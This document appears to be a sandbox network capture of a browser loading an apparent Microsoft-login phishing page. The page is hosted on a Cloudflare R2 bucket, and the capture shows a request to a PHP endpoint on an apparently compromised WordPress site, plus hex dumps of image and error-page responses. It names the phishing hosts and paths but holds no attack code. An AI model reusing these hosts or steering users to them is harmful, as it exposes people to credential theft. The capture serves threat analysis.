24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	13.107.213.45	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:17 UTC	681	OUT	GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:17 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:17 GMT Content-Type: image/svg+xml Content-Length: 621 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT ETag: 0x8D8852A7FA6B761 x-ms-request-id: ace7413e-901e-0033-6848-adb989000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240523T222917Z-16f669959b4k2842qfx0xu3vng000000058g00000000nckz x-fd-int-roxy-purgeid: 4554691 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-05-23 22:29:17 UTC	621	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=\|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	152.199.23.37	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:17 UTC	682	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:17 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 5166651 Cache-Control: public, max-age=31536000 Content-MD5: DhdidjYrlCeaRJJRG/y9mA== Content-Type: image/svg+xml Date: Thu, 23 May 2024 22:29:17 GMT Etag: 0x8D7B007297AE131 Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT Server: ECAcc (lhd/35BE) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 5c9954f4-701e-0084-7f63-7ea17b000000 x-ms-version: 2009-09-19 Content-Length: 1864 Connection: close
2024-05-23 22:29:17 UTC	1864	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	13.107.213.67	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:17 UTC	414	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:17 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:17 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:34 GMT ETag: 0x8D79B8371B97A82 x-ms-request-id: 29b5eec8-201e-0074-4a60-adbb96000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240523T222917Z-16f669959b4kxg8rper91yzfwg00000005k0000000000vtc x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-05-23 22:29:17 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	2.18.97.153	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:17 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 22:29:17 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=236485 Date: Thu, 23 May 2024 22:29:17 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	148.72.158.229	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:17 UTC	625	OUT	GET /wp-from/prv.php HTTP/1.1 Host: c2millwrightmachineshop.ca Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:17 UTC	383	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:17 GMT Server: Apache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Headers: x-test-header, Origin, X-Requested-With, Content-Type, Accept Referrer-Policy: no-referrer-when-downgrade Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	152.199.23.37	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:17 UTC	420	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:17 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 5253414 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Thu, 23 May 2024 22:29:17 GMT Etag: 0x8D79A1B9F5E121A Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT Server: ECAcc (lhd/35E6) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: fb160a5f-a01e-00ad-4a99-7d435b000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-05-23 22:29:17 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	104.18.2.35	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:18 UTC	653	OUT	GET /favicon.ico HTTP/1.1 Host: pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:18 UTC	180	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 22:29:18 GMT Content-Type: text/html Content-Length: 27242 Connection: close Server: cloudflare CF-RAY: 88887be6fd75427f-EWR
2024-05-23 22:29:18 UTC	1189	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 66 6f 6f 74 65 72 2d 74 69 74 6c 65 22 3e 49 73 20 74 68 69 73 20 79 6f 75 72 20 62 75 63 6b 65 74 3f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/"
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 Data Ascii: l="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 4c 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 43 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 20 36 32 2e 34 37 32 20 39 38 2e 33 33 34 35 20 36 37 2e 38 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 Data Ascii: <path d="M56.0777 105.406L60.9712 106.906C60.9712 106.906 62.472 98.3345 67.8304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 20 31 32 34 2e 37 31 37 20 31 30 36 2e 39 33 37 43 31 32 34 2e 30 35 38 20 31 30 36 2e 39 33 37 20 31 32 33 2e 34 30 36 20 31 30 37 2e 30 36 37 20 31 32 32 2e 37 39 38 20 31 30 37 2e 33 31 39 43 31 32 32 2e 31 38 39 20 31 30 37 2e 35 37 31 20 31 32 31 2e 36 33 36 20 31 30 37 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: 124.717 106.937C124.058 106.937 123.406 107.067 122.798 107.319C122.189 107.571 121.636 107.941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC"
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 43 31 33 34 2e 39 39 35 20 34 38 2e 39 35 31 36 20 31 33 31 2e 31 30 36 20 34 35 2e 30 36 32 37 20 31 33 31 2e 31 30 36 20 34 30 2e 32 36 35 36 43 31 33 31 2e 31 30 36 20 33 35 2e 34 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 Data Ascii: d="M139.792 48.9516C134.995 48.9516 131.106 45.0627 131.106 40.2656C131.106 35.4684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white"
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 37 34 20 31 31 30 2e 33 35 37 20 34 34 2e 35 31 31 38 20 31 31 31 2e 34 37 32 20 34 34 2e 35 31 33 39 43 31 31 32 2e 35 38 38 20 34 34 2e 35 31 33 39 20 31 31 33 2e 36 35 38 20 34 34 2e 30 37 30 36 20 31 31 34 2e 34 34 37 20 34 33 2e 32 38 31 33 43 31 31 35 2e 32 33 37 20 34 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 Data Ascii: 74 110.357 44.5118 111.472 44.5139C112.588 44.5139 113.658 44.0706 114.447 43.2813C115.237 42.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.550
2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 20 31 35 32 2e 36 34 31 20 31 32 37 2e 35 35 32 20 31 34 38 2e 32 34 39 20 31 32 37 2e 35 35 32 20 31 34 32 2e 38 33 31 43 31 32 37 2e 35 35 32 20 31 33 37 2e 34 31 32 20 31 33 31 2e 38 31 38 20 31 33 33 2e 30 32 20 31 33 37 2e 30 38 31 20 31 33 33 2e 30 32 43 31 34 32 2e 33 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 Data Ascii: 152.641 127.552 148.249 127.552 142.831C127.552 137.412 131.818 133.02 137.081 133.02C142.344 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g
